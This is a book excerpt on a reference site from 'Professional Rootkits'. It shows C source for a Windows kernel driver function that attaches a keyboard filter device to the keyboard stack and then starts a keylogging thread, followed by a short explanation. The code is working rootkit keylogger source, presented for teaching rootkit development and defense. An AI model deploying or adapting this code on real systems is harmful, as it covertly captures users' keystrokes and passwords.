filterManager.c


Only the keyManager include statement and the function insertKeyboardFilter were added to filterManager.c:

  #include "keyManager.h"NTSTATUS insertKeyboardFilter(PDRIVER_OBJECT pDriverObject,  PDEVICE_OBJECT* ppOldDevice,  PDEVICE_OBJECT* ppNewDevice,  wchar_t* deviceName) {  NTSTATUS status = STATUS_SUCCESS;  UNICODE_STRING unicodeName = { 0 };  // Create a new device  status = IoCreateDevice( pDriverObject,   0,   NULL,   FILE_DEVICE_KEYBOARD,   0,   FALSE,   ppNewDevice );   if( !NT_SUCCESS( status ) )    return status;  // Initialize the new device  ((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);  ((PDEVICE_OBJECT)(*ppNewDevice))->Flags &= ~DO_DEVICE_INITIALIZING;  // Attach the new device  RtlInitUnicodeString( &unicodeName, deviceName );  status = IoAttachDevice( *ppNewDevice,   &unicodeName,   ppOldDevice );  // Prevent unload if load failed  if( !NT_SUCCESS( status ) )  {   IoDeleteDevice( *ppNewDevice );   *ppNewDevice = NULL;  }  else  {   // Prepare the keylogging thread   StartKeylogger( pDriverObject ); } return status; } 

This function is very similar to the network filter insertion function, insertNetworkFilter. The new device is created as type FILE_DEVICE_KEYBOARD, and the flags are a bit different.




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net